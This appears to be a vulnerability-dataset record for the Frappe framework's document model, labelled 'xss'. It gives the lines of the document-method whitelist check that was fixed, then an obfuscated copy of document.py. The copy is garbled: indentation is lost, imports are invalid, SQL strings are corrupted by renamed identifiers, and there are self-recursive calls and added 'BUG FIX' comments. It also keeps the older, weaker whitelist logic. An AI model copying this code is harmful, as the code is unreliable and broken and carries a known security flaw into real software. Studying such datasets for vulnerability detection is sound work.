		"""Check that value of fieldname should be 'condition' val2
		else throw Exception.

		:param fieldname: field to read on `doc`
		:param condition: comparison operator understood by `frappe.compare`
			(e.g. "in", "not in", "^")
		:param val2: value to compare against (cast to the field's type first)
		:param doc: document to read the value from; defaults to self
		:param raise_exception: exception to raise on failure (default True)"""
		error_condition_map = {
			"in": _("one of"),
			"not in": _("none of"),
			"^": _("beginning with"),
		}

		if not doc:
			doc = self

		val1 = doc.get_value(fieldname)

		df = doc.meta.get_field(fieldname)
		val2 = doc.cast(val2, df)

		if not frappe.compare(val1, condition, val2):
			label = doc.meta.get_label(fieldname)
			condition_str = error_condition_map.get(condition, condition)
			if doc.parentfield:
				# child-table rows include their row number in the message
				msg = _("Incorrect value in row {0}: {1} must be {2} {3}").format(doc.idx, label, condition_str, val2)
			else:
				msg = _("Incorrect value: {0} must be {1} {2}").format(label, condition_str, val2)

			# raise passed exception or True
			msgprint(msg, raise_exception=raise_exception or True)
def validate_table_has_rows(self, parentfield, raise_exception=None):
"""Raise exception if Table field is empty."""
if not (isinstance(self.get(parentfield), list) and len(self.get(parentfield)) > 0):
label = self.meta.get_label(parentfield)
frappe.throw(_("Table {0} cannot be empty").format(label), raise_exception or frappe.EmptyTableError)
def round_floats_in(self, doc, fieldnames=None):
"""Round floats for all `Currency`, `Float`, `Percent` fields for the given doc.
:param doc: Document whose numeric properties are to be rounded.
:param fieldnames: [Optional] List of fields to be rounded."""
if not fieldnames:
fieldnames = (df.fieldname for df in
doc.meta.get("fields", {"fieldtype": ["in", ["Currency", "Float", "Percent"]]}))
for fieldname in fieldnames:
doc.set(fieldname, flt(doc.get(fieldname), self.precision(fieldname, doc.parentfield)))
def get_url(self):
"""Returns Desk URL for this document. `/app/Form/{doctype}/{name}`"""
return "/app/Form/{doctype}/{name}".format(doctype=self.doctype, name=self.name)
def add_comment(self, comment_type='Comment', text=None, comment_email=None, link_doctype=None, link_name=None, comment_by=None):
"""Add a comment to this document.
:param comment_type: e.g. `Comment`. See Communication for more info."""
out = frappe.get_doc({
"doctype":"Comment",
'comment_type': comment_type,
"comment_email": comment_email or frappe.session.user,
"comment_by": comment_by,
"reference_doctype": self.doctype,
"reference_name": self.name,
"content": text or comment_type,
"link_doctype": link_doctype,
"link_name": link_name
}).insert(ignore_permissions=True)
return out
def add_seen(self, user=None):
"""add the given/current user to list of users who have seen this document (_seen)"""
if not user:
user = frappe.session.user
if self.meta.track_seen:
_seen = self.get('_seen') or []
_seen = frappe.parse_json(_seen)
if user not in _seen:
_seen.append(user)
frappe.db.set_value(self.doctype, self.name, '_seen', json.dumps(_seen), update_modified=False)
frappe.local.flags.commit = True
def add_viewed(self, user=None):
"""add log to communication when a user views a document"""
if not user:
user = frappe.session.user
if hasattr(self.meta, 'track_views') and self.meta.track_views:
frappe.get_doc({
"doctype": "View Log",
"viewed_by": frappe.session.user,
"reference_doctype": self.doctype,
"reference_name": self.name,
}).insert(ignore_permissions=True)
frappe.local.flags.commit = True
def get_signature(self):
"""Returns signature (hash) for private URL."""
return hashlib.sha224(get_datetime_str(self.creation).encode()).hexdigest()
def get_liked_by(self):
liked_by = getattr(self, "_liked_by", None)
if liked_by:
return json.loads(liked_by)
else:
return []
def set_onload(self, key, value):
if not self.get("__onload"):
self.set("__onload", frappe._dict())
self.get("__onload")[key] = value
def get_onload(self, key=None):
if not key:
return self.get("__onload", frappe._dict())
return self.get('__onload')[key]
def queue_action(self, action, **kwargs):
"""Run an action in background. If the action has an inner function,
like _submit for submit, it will call that instead"""
# call _submit instead of submit, so you can override submit to call
# run_delayed based on some action
# See: Stock Reconciliation
from frappe.utils.background_jobs import enqueue
if hasattr(self, '_' + action):
action = '_' + action
if file_lock.lock_exists(self.get_signature()):
frappe.throw(_('This document is currently queued for execution. Please try again'),
title=_('Document Queued'))
self.lock()
enqueue('frappe.model.document.execute_action', doctype=self.doctype, name=self.name,
action=action, **kwargs)
	def lock(self, timeout=None):
		"""Creates a lock file for the given document. If timeout is set,
		it will retry every 1 second for acquiring the lock again

		:param timeout: Timeout in seconds, default 0
		:raises frappe.DocumentLockedError: if the lock is still held after
			the (optional) retry window."""
		signature = self.get_signature()
		if file_lock.lock_exists(signature):
			lock_exists = True
			if timeout:
				# poll once per second until the lock is released or timeout expires
				for i in range(timeout):
					time.sleep(1)
					if not file_lock.lock_exists(signature):
						lock_exists = False
						break
			if lock_exists:
				raise frappe.DocumentLockedError
		file_lock.create_lock(signature)
def unlock(self):
"""Delete the lock file for this document"""
file_lock.delete_lock(self.get_signature())
# validation helpers
	def validate_from_to_dates(self, from_date_field, to_date_field):
		"""
		Generic validation to verify date sequence

		Throws `frappe.exceptions.InvalidDates` if the value of `to_date_field`
		is earlier than the value of `from_date_field`.
		"""
		if date_diff(self.get(to_date_field), self.get(from_date_field)) < 0:
			frappe.throw(_('{0} must be after {1}').format(
				frappe.bold(self.meta.get_label(to_date_field)),
				frappe.bold(self.meta.get_label(from_date_field)),
			), frappe.exceptions.InvalidDates)
def get_assigned_users(self):
assignments = frappe.get_all('ToDo',
fields=['owner'],
filters={
'reference_type': self.doctype,
'reference_name': self.name,
'status': ('!=', 'Cancelled'),
})
users = set([assignment.owner for assignment in assignments])
return users
def add_tag(self, tag):
"""Add a Tag to this document"""
from frappe.desk.doctype.tag.tag import DocTags
DocTags(self.doctype).add(self.name, tag)
def get_tags(self):
"""Return a list of Tags attached to this document"""
from frappe.desk.doctype.tag.tag import DocTags
return DocTags(self.doctype).get_tags(self.name).split(",")[1:]
def execute_action(doctype, name, action, **kwargs):
	"""Execute an action on a document (called by background worker)

	:param doctype: doctype of the target document
	:param name: name of the target document
	:param action: method name to invoke on the document
	:param kwargs: forwarded to the action method"""
	doc = frappe.get_doc(doctype, name)
	# release the queue lock taken by queue_action before running
	doc.unlock()
	try:
		getattr(doc, action)(**kwargs)
	except Exception:
		frappe.db.rollback()

		# add a comment (?)
		if frappe.local.message_log:
			msg = json.loads(frappe.local.message_log[-1]).get('message')
		else:
			msg = '<pre><code>' + frappe.get_traceback() + '</pre></code>'

		doc.add_comment('Comment', _('Action Failed') + '<br><br>' + msg)
		doc.notify_update()
| xss | {
"code": [
"from frappe import _, msgprint",
"\tdef whitelist(f):",
"\t\tf.whitelisted = True",
"\t\treturn f",
"\tdef is_whitelisted(self, method):",
"\t\tfn = getattr(self, method, None)",
"\t\t\traise NotFound(\"Method {0} not found\".format(method))",
"\t\telif not getattr(fn, \"whitelisted\", False):",
"\t\t\traise Forbidden(\"Method {0} not whitelisted\".format(method))"
],
"line_no": [
7,
129,
131,
132,
1151,
1152,
1154,
1155,
1156
]
} | {
"code": [
"from frappe import _, msgprint, is_whitelisted",
"\tdef whitelist(fn):",
"\t\tfrappe.whitelist()(fn)",
"\t\treturn fn",
"\tdef is_whitelisted(self, method_name):",
"\t\tmethod = getattr(self, method_name, None)",
"\t\t\traise NotFound(\"Method {0} not found\".format(method_name))",
"\t\tis_whitelisted(getattr(method, '__func__', method))"
],
"line_no": [
7,
129,
131,
132,
1151,
1152,
1154,
1156
]
} |
from __future__ import unicode_literals, print_function
import .frappe
import time
from frappe import _, msgprint
from frappe.utils import .flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import .set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, VAR_81
from frappe.model.workflow import .validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import .follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
def FUNC_0(*VAR_0, **VAR_1):
if VAR_0:
if isinstance(VAR_0[0], BaseDocument):
return VAR_0[0]
elif isinstance(VAR_0[0], string_types):
VAR_2 = VAR_0[0]
elif isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(VAR_0) < 2 and VAR_1:
if 'doctype' in VAR_1:
VAR_2 = VAR_1['doctype']
else:
raise ValueError('"doctype" is a required key')
VAR_5 = get_controller(VAR_2)
if VAR_5:
return VAR_5(*VAR_0, **VAR_1)
raise ImportError(VAR_2)
class CLASS_0(BaseDocument):
def __init__(self, *VAR_0, **VAR_1):
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], string_types):
if len(VAR_0)==1:
self.doctype = self.name = VAR_0[0]
else:
self.doctype = VAR_0[0]
if isinstance(VAR_0[1], dict):
self.name = frappe.db.get_value(VAR_0[0], VAR_0[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(VAR_0[0]), VAR_0[1]),
frappe.DoesNotExistError)
else:
self.name = VAR_0[1]
if 'for_update' in VAR_1:
self.flags.for_update = VAR_1.get('for_update')
self.load_from_db()
return
if VAR_0 and VAR_0[0] and isinstance(VAR_0[0], dict):
VAR_1 = VAR_0[0]
if VAR_1:
super(CLASS_0, self).__init__(VAR_1)
self.init_valid_columns()
else:
raise ValueError('Illegal arguments')
@staticmethod
def FUNC_2(VAR_6):
VAR_6.whitelisted = True
return VAR_6
def FUNC_3(self):
self.load_from_db()
def FUNC_4(self):
if not getattr(self, "_metaclass", False) and self.meta.issingle:
VAR_80 = frappe.db.get_singles_dict(self.doctype)
if not VAR_80:
single_doc = frappe.new_doc(self.doctype).as_dict()
VAR_80["name"] = self.doctype
del VAR_80["__islocal"]
super(CLASS_0, self).__init__(VAR_80)
self.init_valid_columns()
self._fix_numeric_types()
else:
VAR_21 = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not VAR_21:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(CLASS_0, self).__init__(VAR_21)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
VAR_81 = DOCTYPE_TABLE_FIELDS
else:
VAR_81 = self.meta.get_table_fields()
for VAR_19 in VAR_81:
VAR_50 = frappe.db.get_values(VAR_19.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": VAR_19.fieldname},
"*", as_dict=True, order_by="idx asc")
if VAR_50:
self.set(VAR_19.fieldname, VAR_50)
else:
self.set(VAR_19.fieldname, [])
if hasattr(self, "__setup__"):
self.__setup__()
def FUNC_5(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def FUNC_6(self, VAR_7='read', VAR_8=None):
if not self.has_permission(VAR_7):
self.raise_no_permission_to(VAR_8 or VAR_7)
def FUNC_7(self, VAR_7="read", VAR_9=False):
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, VAR_7, self, VAR_9=verbose)
def FUNC_8(self, VAR_10):
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def FUNC_9(self, VAR_11=None, VAR_12=None, VAR_13=False,
VAR_14=None, VAR_15=None, VAR_16=True):
if self.flags.in_print:
return
self.flags.notifications_executed = []
if VAR_11!=None:
self.flags.ignore_permissions = VAR_11
if VAR_12!=None:
self.flags.ignore_links = VAR_12
if VAR_14!=None:
self.flags.ignore_mandatory = VAR_14
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(VAR_15=set_name, VAR_16=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not VAR_13:
raise e
for VAR_21 in self.get_all_children():
VAR_21.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def FUNC_10(self, *VAR_0, **VAR_1):
return self._save(*VAR_0, **VAR_1)
def FUNC_11(self, VAR_11=None, VAR_17=None):
	"""Save (update) an existing document; delegates to insert() for new docs.

	Args:
		VAR_11: when not None, overrides ``flags.ignore_permissions``.
		VAR_17: when not None, overrides ``flags.ignore_version``
			(defaults to skipping Version records while running tests).

	Returns:
		self, or None when called during print rendering / after insert.
	"""
	if self.flags.in_print:
		return

	self.flags.notifications_executed = []

	if VAR_11!=None:
		self.flags.ignore_permissions = VAR_11

	self.flags.ignore_version = frappe.flags.in_test if VAR_17 is None else VAR_17

	# brand-new documents are delegated to insert()
	if self.get("__islocal") or not self.get("name"):
		self.insert()
		return

	self.check_permission("write", "save")

	self.set_user_and_timestamp()
	self.set_docstatus()
	self.check_if_latest()
	self.set_parent_in_children()
	self.set_name_in_children()

	self.validate_higher_perm_levels()
	self._validate_links()
	self.run_before_save_methods()

	if self._action != "cancel":
		self._validate()

	if self._action == "update_after_submit":
		self.validate_update_after_submit()

	self.set_docstatus()

	# parent row: singles go to tabSingles, everything else to its table
	if self.meta.issingle:
		self.update_single(self.get_valid_dict())
	else:
		self.db_update()

	self.update_children()
	self.run_post_save_methods()

	if hasattr(self, "__unsaved"):
		delattr(self, "__unsaved")

	return self
def FUNC_12(self):
	"""Copy File attachments from the document this one was amended from."""
	from frappe.desk.form.load import get_attachments

	# duplicate each attachment File record, pointing it at this document
	for attach_item in get_attachments(self.doctype, self.amended_from):
		VAR_82 = frappe.get_doc({
			"doctype": "File",
			"file_url": attach_item.file_url,
			"file_name": attach_item.file_name,
			"attached_to_name": self.name,
			"attached_to_doctype": self.doctype,
			"folder": "Home/Attachments"})
		VAR_82.save()
def FUNC_13(self):
	"""Persist every child table of this document to the database."""
	for child_field in self.meta.get_table_fields():
		self.update_child_table(child_field.fieldname, child_field)
def FUNC_14(self, VAR_18, VAR_19=None):
	"""Sync child table *VAR_18*: write the in-memory rows, then delete DB
	rows that were removed from the document.

	Args:
		VAR_18: fieldname of the child table on this document.
		VAR_19: the docfield; looked up from meta when omitted.
	"""
	VAR_48 = []

	if not VAR_19:
		VAR_19 = self.meta.get_field(VAR_18)

	# write every in-memory row and remember its name
	for VAR_21 in self.get(VAR_19.fieldname):
		VAR_21.db_update()
		VAR_48.append(VAR_21.name)

	# skip deletion for child doctypes explicitly exempted via flags
	if VAR_19.options in (self.flags.ignore_children_type or []):
		return

	if VAR_48:
		# find DB rows no longer present on the document, then delete them
		VAR_83 = frappe.db.sql("""select VAR_3 from `tab{0}` where parent=%s
			and VAR_24=%s and VAR_34=%s
			and VAR_3 not in ({1})""".format(VAR_19.options, ','.join(['%s'] * len(VAR_48))),
			[self.name, self.doctype, VAR_18] + VAR_48)

		if len(VAR_83) > 0:
			frappe.db.sql("""delete from `tab{0}` where VAR_3 in ({1})""".format(VAR_19.options,
				','.join(['%s'] * len(VAR_83))), tuple(row[0] for row in VAR_83))
	else:
		# no rows left on the document: wipe the whole child table
		frappe.db.sql("""delete from `tab{0}` where parent=%s
			and VAR_24=%s and VAR_34=%s""".format(VAR_19.options),
			(self.name, self.doctype, VAR_18))
def FUNC_15(self):
	"""Return the pre-save snapshot of this document, or None if absent."""
	try:
		return self._doc_before_save
	except AttributeError:
		return None
def FUNC_16(self, VAR_18):
	"""Return True if *VAR_18* changed since the pre-save snapshot.

	When no snapshot exists the field is treated as changed.
	"""
	previous = self.get_doc_before_save()
	if not previous:
		return True
	return previous.get(VAR_18) != self.get(VAR_18)
def FUNC_17(self, VAR_20=False, VAR_15=None, VAR_16=True):
	"""Compute and assign ``self.name`` for a new document.

	Args:
		VAR_20: force re-naming even when a name was already set.
		VAR_15: explicit name to use, bypassing the naming machinery.
		VAR_16: when True, also name all child rows.
	"""
	if self.flags.name_set and not VAR_20:
		return

	# a client-supplied "__newname" wins over everything else
	if self.get("__newname"):
		self.name = self.get("__newname")
		self.flags.name_set = True
		return

	if VAR_15:
		self.name = VAR_15
	else:
		# NOTE(review): this self-call looks like it should invoke the
		# module-level naming helper (frappe.model.naming.set_new_name);
		# as written it recurses into this method — confirm against the
		# file's imports.
		FUNC_17(self)

	if VAR_16:
		for VAR_21 in self.get_all_children():
			FUNC_17(VAR_21)

	self.flags.name_set = True
def FUNC_18(self):
	"""Return the value of this doctype's configured title field."""
	title_field = self.meta.get_title_field()
	return self.get(title_field)
def FUNC_19(self):
	"""Fill the "title" field from its options template or default, if set."""
	def FUNC_80():
		# this doc's values with Nones blanked, safe for str.format
		VAR_84 = self.as_dict()
		for VAR_43, VAR_26 in iteritems(VAR_84):
			if VAR_26==None:
				VAR_84[VAR_43] = ""
		return VAR_84

	if self.meta.get("title_field")=="title":
		VAR_19 = self.meta.get_field(self.meta.title_field)

		if VAR_19.options:
			# options holds a format template, e.g. "{first_name} {last_name}"
			self.set(VAR_19.fieldname, VAR_19.options.format(**FUNC_80()))
		elif self.is_new() and not self.get(VAR_19.fieldname) and VAR_19.default:
			# new doc without a title: fall back to the default template
			self.set(VAR_19.fieldname, VAR_19.default.format(**FUNC_80()))
def FUNC_20(self, VAR_21):
	"""Rewrite this Single doctype's values in `tabSingles`.

	Args:
		VAR_21: dict of fieldname -> value to persist.
	"""
	frappe.db.sql("""delete from `tabSingles` where VAR_2=%s""", self.doctype)
	for field, VAR_26 in iteritems(VAR_21):
		if field != "doctype":
			frappe.db.sql("""insert into `tabSingles` (VAR_2, field, VAR_26)
				VAR_84 (%s, %s, %s)""", (self.doctype, field, VAR_26))

	# drop stale cached values for this doctype
	if self.doctype in frappe.db.value_cache:
		del frappe.db.value_cache[self.doctype]
def FUNC_21(self):
	"""Stamp owner/creation/modified metadata on this doc and its children,
	and register the doc as "currently saving".
	"""
	self._original_modified = self.modified
	self.modified = now()
	self.modified_by = frappe.session.user

	if not self.creation:
		self.creation = self.modified
	if not self.owner:
		self.owner = self.modified_by

	for child in self.get_all_children():
		child.modified = self.modified
		child.modified_by = self.modified_by
		if not child.owner:
			child.owner = self.owner
		if not child.creation:
			child.creation = self.creation

	frappe.flags.currently_saving.append((self.doctype, self.name))
def FUNC_22(self):
	"""Default docstatus to 0 (Draft) and propagate it to all children."""
	if self.docstatus==None:
		self.docstatus=0
	for child in self.get_all_children():
		child.docstatus = self.docstatus
def FUNC_23(self):
	"""Run the standard field-level validations on this doc and its children."""
	self._validate_mandatory()
	self._validate_data_fields()
	self._validate_selects()
	self._validate_non_negative()
	self._validate_length()
	self._extract_images_from_text_editor()
	self._sanitize_content()
	self._save_passwords()
	self.validate_workflow()

	VAR_50 = self.get_all_children()
	for VAR_21 in VAR_50:
		VAR_21._validate_data_fields()
		VAR_21._validate_selects()
		VAR_21._validate_non_negative()
		VAR_21._validate_length()
		VAR_21._extract_images_from_text_editor()
		VAR_21._sanitize_content()
		VAR_21._save_passwords()

	if self.is_new():
		# framework-managed house-keeping columns start out empty
		for VAR_18 in optional_fields:
			self.set(VAR_18, None)
	else:
		self.validate_set_only_once()
def FUNC_24(self):
	"""Throw NonNegativeError when a field marked non_negative is negative."""
	def FUNC_81(VAR_19):
		# row-aware message for child rows, plain message otherwise
		if self.parentfield:
			return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
				_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(VAR_19.label)))
		else:
			return _("Value cannot be negative for {0}: {1}").format(_(VAR_19.parent), frappe.bold(_(VAR_19.label)))

	for VAR_19 in self.meta.get('fields', {'non_negative': ('=', 1),
		'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
		if flt(self.get(VAR_19.fieldname)) < 0:
			VAR_87 = FUNC_81(VAR_19)
			frappe.throw(VAR_87, frappe.NonNegativeError, title=_("Negative Value"))
def FUNC_25(self):
	"""Validate the workflow transition for the current action, then apply
	the resulting workflow state (except on plain save)."""
	if frappe.flags.in_install == 'frappe': return
	VAR_51 = self.meta.get_workflow()
	if VAR_51:
		# NOTE(review): this self-call looks like it should invoke the
		# module-level frappe.model.workflow.validate_workflow helper; as
		# written it recurses into this method — confirm against imports.
		FUNC_25(self)
		if not self._action == 'save':
			set_workflow_state_on_action(self, VAR_51, self._action)
def FUNC_26(self):
	"""Throw CannotChangeConstantError if a "set only once" field changed."""
	VAR_52 = self.meta.get_set_only_once_fields()

	if VAR_52 and self._doc_before_save:
		for field in VAR_52:
			VAR_97 = False  # did this field's value change?
			VAR_26 = self.get(field.fieldname)
			VAR_53 = self._doc_before_save.get(field.fieldname)

			if field.fieldtype in VAR_81:
				# child tables need a row-by-row comparison
				VAR_97 = not self.is_child_table_same(field.fieldname)
			elif field.fieldtype in ('Date', 'Datetime', 'Time'):
				# compare as strings so date objects and strings agree
				VAR_97 = str(VAR_26) != str(VAR_53)
			else:
				VAR_97 = VAR_26 != VAR_53

			if VAR_97:
				frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
					frappe.CannotChangeConstantError)

	return False
def FUNC_27(self, VAR_18):
	"""Return True when child table *VAR_18* is unchanged vs the pre-save
	snapshot (rows compared pairwise, ignoring bookkeeping columns)."""
	VAR_26 = self.get(VAR_18)
	VAR_53 = self._doc_before_save.get(VAR_18)
	VAR_54 = True

	if len(VAR_53) != len(VAR_26):
		VAR_54 = False
	else:
		# compare each old row against the new row at the same index
		for i, VAR_21 in enumerate(VAR_53):
			VAR_98 = VAR_26[i].as_dict(convert_dates_to_str = True)
			VAR_99 = VAR_21.as_dict(convert_dates_to_str = True)

			# modification metadata is expected to differ; drop it
			for VAR_43 in ('modified', 'modified_by', 'creation'):
				del VAR_98[VAR_43]
				del VAR_99[VAR_43]

			if VAR_99 != VAR_98:
				VAR_54 = False
				break

	return VAR_54
def FUNC_28(self):
	"""Blank out field values whose permlevel the user cannot read.

	Administrator bypasses the check entirely.
	"""
	if frappe.session.user == "Administrator":
		return

	# first find out whether any field (own or child) uses permlevels
	VAR_55 = False
	VAR_56 = self.meta.fields.copy()
	for table_field in self.meta.get_table_fields():
		VAR_56 += frappe.get_meta(table_field.options).fields or []

	for VAR_19 in VAR_56:
		if VAR_19.permlevel > 0:
			VAR_55 = True
			break

	if not VAR_55:
		return

	VAR_57 = self.get_permlevel_access('read')

	# clear own fields above the user's readable permlevels
	for VAR_19 in self.meta.fields:
		if VAR_19.permlevel and not VAR_19.permlevel in VAR_57:
			self.set(VAR_19.fieldname, None)

	# and do the same for every child row
	for table_field in self.meta.get_table_fields():
		for VAR_19 in frappe.get_meta(table_field.options).fields or []:
			if VAR_19.permlevel and not VAR_19.permlevel in VAR_57:
				for child in self.get(table_field.fieldname) or []:
					child.set(VAR_19.fieldname, None)
def FUNC_29(self):
	"""Revert values of fields at permlevels the user may not write,
	for this document and all its children."""
	if self.flags.ignore_permissions or frappe.flags.in_install:
		return
	if frappe.session.user == "Administrator":
		return

	VAR_57 = self.get_permlevel_access()
	VAR_58 = self.meta.get_high_permlevel_fields()

	if VAR_58:
		self.reset_values_if_no_permlevel_access(VAR_57, VAR_58)
	if self.is_new(): return

	# child rows get the same treatment against their own meta
	for VAR_19 in self.meta.get_table_fields():
		VAR_58 = frappe.get_meta(VAR_19.options).get_high_permlevel_fields()
		if VAR_58:
			for VAR_21 in self.get(VAR_19.fieldname):
				VAR_21.reset_values_if_no_permlevel_access(VAR_57, VAR_58)
def FUNC_30(self, VAR_22='write'):
	"""Return the permlevels at which the user has *VAR_22* rights.

	Results are cached per access type on ``self._has_access_to``.
	"""
	if not hasattr(self, "_has_access_to"):
		self._has_access_to = {}

	levels = self._has_access_to[VAR_22] = []
	user_roles = frappe.get_roles()
	for rule in self.get_permissions():
		if rule.role in user_roles and rule.get(VAR_22) and rule.permlevel not in levels:
			levels.append(rule.permlevel)

	return levels
def FUNC_31(self, VAR_18, VAR_19=None, VAR_22='read'):
	"""Return True if *VAR_18*'s permlevel is accessible for *VAR_22*."""
	meta_field = VAR_19 or self.meta.get_field(VAR_18)
	return meta_field.permlevel in self.get_permlevel_access(VAR_22)
def FUNC_32(self):
	"""Return the permission rules that govern this document.

	Child-table rows have no permissions of their own, so for an
	``istable`` doctype the parent doctype's permissions are used.
	"""
	if self.meta.istable:
		# BUG FIX: the result was assigned to a name that was never
		# returned, raising NameError whenever this branch ran.
		VAR_85 = frappe.get_meta(self.parenttype).permissions
	else:
		VAR_85 = self.meta.permissions

	return VAR_85
def FUNC_33(self):
	"""Fill missing values from the doctype defaults (skipped during import)."""
	if frappe.flags.in_import:
		return

	VAR_60 = frappe.new_doc(self.doctype, as_dict=True)
	self.update_if_missing(VAR_60)

	# children too: apply each child doctype's defaults to its rows
	for VAR_19 in self.meta.get_table_fields():
		VAR_60 = frappe.new_doc(VAR_19.options, as_dict=True)
		VAR_26 = self.get(VAR_19.fieldname)
		if isinstance(VAR_26, list):
			for VAR_21 in VAR_26:
				VAR_21.update_if_missing(VAR_60)
def FUNC_34(self):
	"""Verify the in-memory doc is not stale and the docstatus transition
	is legal; raises TimestampMismatchError on a stale save.

	The select uses ``for update`` so concurrent saves serialize on the row.
	"""
	VAR_61 = False
	self._action = "save"

	if not self.get('__islocal'):
		if self.meta.issingle:
			VAR_100 = frappe.db.sql("""select VAR_26 from tabSingles
				where VAR_2=%s and field='modified' for update""", self.doctype)
			VAR_100 = VAR_100 and VAR_100[0][0]
			if VAR_100 and VAR_100 != cstr(self._original_modified):
				VAR_61 = True
		else:
			VAR_101 = frappe.db.sql("""select VAR_100, VAR_23 from `tab{0}`
				where VAR_3 = %s for update""".format(self.doctype), self.name, as_dict=True)

			if not VAR_101:
				frappe.throw(_("Record does not exist"))
			else:
				# BUG FIX: `tmp` was an undefined name (NameError); unpack
				# the first (and only) row of this query's own result.
				VAR_101 = VAR_101[0]

			VAR_100 = cstr(VAR_101.modified)

			if VAR_100 and VAR_100 != cstr(self._original_modified):
				VAR_61 = True

			self.check_docstatus_transition(VAR_101.docstatus)

		if VAR_61:
			frappe.msgprint(_("Error: CLASS_0 has been VAR_100 after you have opened it") \
				+ (" (%s, %s). " % (VAR_100, self.modified)) \
				+ _("Please refresh to get the latest document."),
				VAR_33=frappe.TimestampMismatchError)
	else:
		# brand-new document: only the docstatus transition needs checking
		self.check_docstatus_transition(0)
def FUNC_35(self, VAR_23):
	"""Validate the docstatus change and set ``self._action``.

	Args:
		VAR_23: the docstatus currently stored in the database.

	Raises:
		frappe.DocstatusTransitionError: on an illegal transition.
		frappe.ValidationError: when editing a cancelled document.
	"""
	if not self.docstatus:
		self.docstatus = 0
	if VAR_23==0:
		# stored Draft -> may stay draft (save) or become submitted
		if self.docstatus==0:
			self._action = "save"
		elif self.docstatus==1:
			self._action = "submit"
			self.check_permission("submit")
		else:
			raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 0 to 2"))

	elif VAR_23==1:
		# stored Submitted -> may be updated in place or cancelled
		if self.docstatus==1:
			self._action = "update_after_submit"
			self.check_permission("submit")
		elif self.docstatus==2:
			self._action = "cancel"
			self.check_permission("cancel")
		else:
			raise frappe.DocstatusTransitionError(_("Cannot change VAR_23 from 1 to 0"))

	elif VAR_23==2:
		raise frappe.ValidationError(_("Cannot edit cancelled document"))
def FUNC_36(self):
	"""Point each child row's parent/parenttype at this document."""
	for child in self.get_all_children():
		child.parent = self.name
		child.parenttype = self.doctype
def FUNC_37(self):
	"""Assign names to any child rows that do not have one yet."""
	for child in self.get_all_children():
		if not child.name:
			FUNC_17(child)
def FUNC_38(self):
	"""Check that only allow-on-submit fields changed on a submitted doc."""
	if self.flags.ignore_validate_update_after_submit:
		return

	self._validate_update_after_submit()
	for VAR_21 in self.get_all_children():
		# brand-new rows in an allow-on-submit table are permitted as-is
		if VAR_21.is_new() and self.meta.get_field(VAR_21.parentfield).allow_on_submit:
			continue
		VAR_21._validate_update_after_submit()
def FUNC_39(self):
	"""Collect missing mandatory fields (self + children); raise MandatoryError."""
	if self.flags.ignore_mandatory:
		return

	VAR_62 = self._get_missing_mandatory_fields()
	for VAR_21 in self.get_all_children():
		VAR_62.extend(VAR_21._get_missing_mandatory_fields())

	if not VAR_62:
		return

	# surface each individual message before raising
	for VAR_18, VAR_87 in VAR_62:
		msgprint(VAR_87)

	if frappe.flags.print_messages:
		print(self.as_json().encode("utf-8"))

	raise frappe.MandatoryError('[{VAR_2}, {VAR_3}]: {fields}'.format(
		fields=", ".join((each[0] for each in VAR_62)),
		VAR_2=self.doctype,
		VAR_3=self.name))
def FUNC_40(self):
	"""Throw if any Link field points to a missing or cancelled document."""
	if self.flags.ignore_links or self._action == "cancel":
		return

	VAR_63, VAR_64 = self.get_invalid_links()

	for VAR_21 in self.get_all_children():
		VAR_86 = VAR_21.get_invalid_links(is_submittable=self.meta.is_submittable)
		VAR_63.extend(VAR_86[0])
		VAR_64.extend(VAR_86[1])

	if VAR_63:
		VAR_87 = ", ".join((each[2] for each in VAR_63))
		frappe.throw(_("Could not find {0}").format(VAR_87),
			frappe.LinkValidationError)

	if VAR_64:
		VAR_87 = ", ".join((each[2] for each in VAR_64))
		frappe.throw(_("Cannot link cancelled document: {0}").format(VAR_87),
			frappe.CancelledLinkError)
def FUNC_41(self, VAR_24=None):
	"""Return every child row of this document.

	When *VAR_24* (a child doctype name) is given, return the rows of the
	first table field whose options match it instead.
	"""
	rows = []
	for table_field in self.meta.get("fields", {"fieldtype": ['in', VAR_81]}):
